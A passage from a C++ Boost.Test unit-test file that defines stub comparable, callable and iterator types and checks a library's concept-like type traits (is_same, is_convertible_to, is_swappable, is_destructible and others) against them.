bool operator==( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator==( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator==( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator==( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator==( const volatile partially_comparable&, const volatile comparable& ) { return true; }
bool operator!=( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator!=( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator!=( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator!=( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator!=( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator!=( const volatile partially_comparable&, const volatile comparable& ) { return true; }
bool operator<( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator<( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator<( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator<( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator<( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator<( const volatile partially_comparable&, const volatile comparable& ) { return true; }
bool operator>( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator>( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator>( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator>( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator>( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator>( const volatile partially_comparable&, const volatile comparable& ) { return true; }
bool operator<=( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator<=( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator<=( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator<=( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator<=( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator<=( const volatile partially_comparable&, const volatile comparable& ) { return true; }
bool operator>=( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator>=( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator>=( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator>=( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator>=( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator>=( const volatile partially_comparable&, const volatile comparable& ) { return true; }
struct callable {
int operator()( int a, int b ) { return a + b; };
};
struct predicate {
bool operator()( const base&, const other& ) { return true; };
};
struct relation {
bool operator()( const base&, const base& ) { return true; };
bool operator()( const other&, const other& ) { return true; };
bool operator()( const base&, const other& ) { return true; };
bool operator()( const other&, const base& ) { return true; };
};
struct implicit_input_iterator {
using value_type = int;
int operator*() const {
return 0;
}
implicit_input_iterator &operator++() {
return *this;
}
void operator++(int) {}
};
bool operator==( const implicit_input_iterator&, const implicit_input_iterator& ) { return true; }
bool operator!=( const implicit_input_iterator&, const implicit_input_iterator& ) { return false; }
int operator-( const implicit_input_iterator&, const implicit_input_iterator& ) { return 0; }
struct explicit_input_iterator {
using value_type = int;
using difference_type = int;
using pointer = int*;
using reference = int;
int operator*() const {
return 0;
}
explicit_input_iterator &operator++() {
return *this;
}
void operator++(int) {}
};
bool operator==( const explicit_input_iterator&, const explicit_input_iterator& ) { return true; }
bool operator!=( const explicit_input_iterator&, const explicit_input_iterator& ) { return false; }
int operator-( const explicit_input_iterator&, const explicit_input_iterator& ) { return 0; }
using implicit_non_output_iterator = implicit_input_iterator;
using explicit_non_output_iterator = explicit_input_iterator;
struct implicit_forward_iterator {
using value_type = int;
int &operator*() const {
static int value = 0;
return value;
}
implicit_forward_iterator &operator++() {
return *this;
}
implicit_forward_iterator operator++(int) {
return *this;
}
};
bool operator==( const implicit_forward_iterator&, const implicit_forward_iterator& ) { return true; }
bool operator!=( const implicit_forward_iterator&, const implicit_forward_iterator& ) { return false; }
int operator-( const implicit_forward_iterator&, const implicit_forward_iterator& ) { return 0; }
struct explicit_forward_iterator {
using value_type = int;
using difference_type = int;
using pointer = int*;
using reference = int&;
int &operator*() const {
static int value = 0;
return value;
}
explicit_forward_iterator &operator++() {
return *this;
}
explicit_forward_iterator operator++(int) {
return *this;
}
};
using implicit_output_iterator = implicit_forward_iterator;
using explicit_output_iterator = explicit_forward_iterator;
bool operator==( const explicit_forward_iterator&, const explicit_forward_iterator& ) { return true; }
bool operator!=( const explicit_forward_iterator&, const explicit_forward_iterator& ) { return false; }
int operator-( const explicit_forward_iterator&, const explicit_forward_iterator& ) { return 0; }
struct implicit_bidirectional_iterator {
using value_type = int;
int &operator*() const {
static int value = 0;
return value;
}
implicit_bidirectional_iterator &operator++() {
return *this;
}
implicit_bidirectional_iterator operator++(int) {
return *this;
}
implicit_bidirectional_iterator &operator--() {
return *this;
}
implicit_bidirectional_iterator operator--(int) {
return *this;
}
};
bool operator==( const implicit_bidirectional_iterator&, const implicit_bidirectional_iterator& ) { return true; }
bool operator!=( const implicit_bidirectional_iterator&, const implicit_bidirectional_iterator& ) { return false; }
int operator-( const implicit_bidirectional_iterator&, const implicit_bidirectional_iterator& ) { return 0; }
struct explicit_bidirectional_iterator {
using value_type = int;
using difference_type = int;
using pointer = int*;
using reference = int&;
int &operator*() const {
static int value = 0;
return value;
}
explicit_bidirectional_iterator &operator++() {
return *this;
}
explicit_bidirectional_iterator operator++(int) {
return *this;
}
explicit_bidirectional_iterator &operator--() {
return *this;
}
explicit_bidirectional_iterator operator--(int) {
return *this;
}
};
bool operator==( const explicit_bidirectional_iterator&, const explicit_bidirectional_iterator& ) { return true; }
bool operator!=( const explicit_bidirectional_iterator&, const explicit_bidirectional_iterator& ) { return false; }
int operator-( const explicit_bidirectional_iterator&, const explicit_bidirectional_iterator& ) { return 0; }
struct implicit_random_access_iterator {
using value_type = int;
int &operator*() const {
static int value = 0;
return value;
}
int &operator[](int) const {
static int value = 0;
return value;
}
implicit_random_access_iterator &operator++() {
return *this;
}
implicit_random_access_iterator operator++(int) {
return *this;
}
implicit_random_access_iterator &operator+=(int) {
return *this;
}
implicit_random_access_iterator &operator--() {
return *this;
}
implicit_random_access_iterator operator--(int) {
return *this;
}
implicit_random_access_iterator &operator-=(int) {
return *this;
}
};
bool operator==( const implicit_random_access_iterator&, const implicit_random_access_iterator& ) { return true; }
bool operator!=( const implicit_random_access_iterator&, const implicit_random_access_iterator& ) { return false; }
bool operator<( const implicit_random_access_iterator&, const implicit_random_access_iterator& ) { return false; }
bool operator>( const implicit_random_access_iterator&, const implicit_random_access_iterator& ) { return false; }
bool operator<=( const implicit_random_access_iterator&, const implicit_random_access_iterator& ) { return true; }
bool operator>=( const implicit_random_access_iterator&, const implicit_random_access_iterator& ) { return true; }
int operator-( const implicit_random_access_iterator&, const implicit_random_access_iterator& ) { return 0; }
implicit_random_access_iterator operator+( int, const implicit_random_access_iterator &a ) { return a; }
implicit_random_access_iterator operator+( const implicit_random_access_iterator &a, int ) { return a; }
implicit_random_access_iterator operator-( const implicit_random_access_iterator &a, int ) { return a; }
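// Random-access-iterator stub with the full set of iterator_traits member typedefs.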
struct explicit_random_access_iterator {
using value_type = int;
using difference_type = int;
using pointer = int*;
using reference = int&;
int &operator*() const {
static int value = 0;
return value;
}
int &operator[](int) const {
static int value = 0;
return value;
}
explicit_random_access_iterator &operator++() {
return *this;
}
explicit_random_access_iterator operator++(int) {
return *this;
}
explicit_random_access_iterator &operator+=(int) {
return *this;
}
explicit_random_access_iterator &operator--() {
return *this;
}
explicit_random_access_iterator operator--(int) {
return *this;
}
explicit_random_access_iterator &operator-=(int) {
return *this;
}
};
bool operator==( const explicit_random_access_iterator&, const explicit_random_access_iterator& ) { return true; }
bool operator!=( const explicit_random_access_iterator&, const explicit_random_access_iterator& ) { return false; }
bool operator<( const explicit_random_access_iterator&, const explicit_random_access_iterator& ) { return false; }
bool operator>( const explicit_random_access_iterator&, const explicit_random_access_iterator& ) { return false; }
bool operator<=( const explicit_random_access_iterator&, const explicit_random_access_iterator& ) { return true; }
bool operator>=( const explicit_random_access_iterator&, const explicit_random_access_iterator& ) { return true; }
int operator-( const explicit_random_access_iterator&, const explicit_random_access_iterator& ) { return 0; }
explicit_random_access_iterator operator+( int, const explicit_random_access_iterator &a ) { return a; }
explicit_random_access_iterator operator+( const explicit_random_access_iterator &a, int ) { return a; }
explicit_random_access_iterator operator-( const explicit_random_access_iterator &a, int ) { return a; }
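// Trivial sentinel: compares equal to itself and to any T it is paired with.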
template< typename T >
struct sentinel {};
template< typename T >
bool operator==( const sentinel< T >&, const sentinel< T >& ) { return true; }
template< typename T >
bool operator==( const sentinel< T >&, const T& ) { return true; }
template< typename T >
bool operator==( const T&, const sentinel< T >& ) { return true; }
template< typename T >
bool operator!=( const sentinel< T >&, const sentinel< T >& ) { return false; }
template< typename T >
bool operator!=( const sentinel< T >&, const T& ) { return false; }
template< typename T >
bool operator!=( const T&, const sentinel< T >& ) { return false; }
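// Sized sentinel: in addition to the equality operators it supports subtraction
// against T in either order, forwarding to T's own difference operation.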
template< typename T >
struct sized_sentinel {};
template< typename T >
bool operator==( const sized_sentinel< T >&, const sized_sentinel< T >& ) { return true; }
template< typename T >
bool operator==( const sized_sentinel< T >&, const T& ) { return true; }
template< typename T >
bool operator==( const T&, const sized_sentinel< T >& ) { return true; }
template< typename T >
bool operator!=( const sized_sentinel< T >&, const sized_sentinel< T >& ) { return false; }
template< typename T >
bool operator!=( const sized_sentinel< T >&, const T& ) { return false; }
template< typename T >
bool operator!=( const T&, const sized_sentinel< T >& ) { return false; }
template< typename T >
auto operator-( const T &i, const sized_sentinel< T >& ) { return i - i; }
template< typename T >
auto operator-( const sized_sentinel< T >&, const T &i ) { return i - i; }
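// The test cases below exercise the slce::is_* traits against the stub types defined above.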
BOOST_AUTO_TEST_CASE(Same) {
BOOST_CHECK_EQUAL( ( slce::is_same< base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_same< base, inherited >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< inherited, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< other, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< const base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< volatile base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< base*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< const int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< volatile int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< int&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_same< int*, base >::value ), false );
}
BOOST_AUTO_TEST_CASE(DerivedFrom) {
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, inherited >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, const base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, volatile base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< inherited, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< other, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< const base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< volatile base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< const int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< volatile int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< int&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< int*, base >::value ), false );
}
BOOST_AUTO_TEST_CASE(ConvertibleTo) {
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, inherited >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, const base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, volatile base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< inherited, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< other, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< const base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< volatile base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base&, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< const int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< volatile int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< int&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< int*, base >::value ), false );
}
BOOST_AUTO_TEST_CASE(CommonReference) {
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, inherited >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, const base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, volatile base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, base& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< inherited, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< other, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< const base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< volatile base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base&, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< const int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< volatile int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< int&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< int*, base >::value ), false );
}
BOOST_AUTO_TEST_CASE(Common) {
BOOST_CHECK_EQUAL( ( slce::is_common< base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common< base, inherited >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common< base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base, const base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common< base, volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base, base& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common< base, base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base, const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base, volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base, int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< inherited, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common< other, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< const base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common< volatile base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base&, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common< base*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< const int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< volatile int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< int&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< int*, base >::value ), false );
}
BOOST_AUTO_TEST_CASE(Integral) {
BOOST_CHECK_EQUAL( ( slce::is_integral< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< inherited >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_integral< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_integral< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_integral< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< unsigned int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_integral< const unsigned int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_integral< volatile unsigned int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_integral< unsigned int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< unsigned int* >::value ), false );
}
BOOST_AUTO_TEST_CASE(SignedIntegral) {
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< inherited >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< unsigned int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< const unsigned int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< volatile unsigned int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< unsigned int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< unsigned int* >::value ), false );
}
BOOST_AUTO_TEST_CASE(UnsignedIntegral) {
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< inherited >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< unsigned int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< const unsigned int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< volatile unsigned int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< unsigned int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< unsigned int* >::value ), false );
}
BOOST_AUTO_TEST_CASE(Assignable) {
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< const base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< volatile base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base&, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< const int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< volatile int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< int&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< int*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< non_copyable&, non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< copyable&, copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_assignable< movable&, movable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_assignable< partially_castable_t2&, partially_castable_t1 >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< fully_castable_t2&, fully_castable_t1 >::value ), true );
}
BOOST_AUTO_TEST_CASE(Swappable) {
BOOST_CHECK_EQUAL( ( slce::is_swappable< base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable< volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable< base& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< base* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< int* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable< copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< movable >::value ), true );
}
BOOST_AUTO_TEST_CASE(SwappableWith) {
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, base& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< const base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< volatile base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base&, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< const int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< volatile int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< int&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< int*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< non_copyable, non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< copyable, copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< movable, movable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< partially_castable_t2, partially_castable_t1 >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< fully_castable_t2, fully_castable_t1 >::value ), false );
}
BOOST_AUTO_TEST_CASE(Destructible) {
BOOST_CHECK_EQUAL( ( slce::is_destructible< destructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< const destructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< volatile destructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< destructible& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< destructible* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< int* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< non_destructible >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_destructible< const non_destructible >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_destructible< volatile non_destructible >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_destructible< non_destructible& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< non_destructible* >::value ), true );
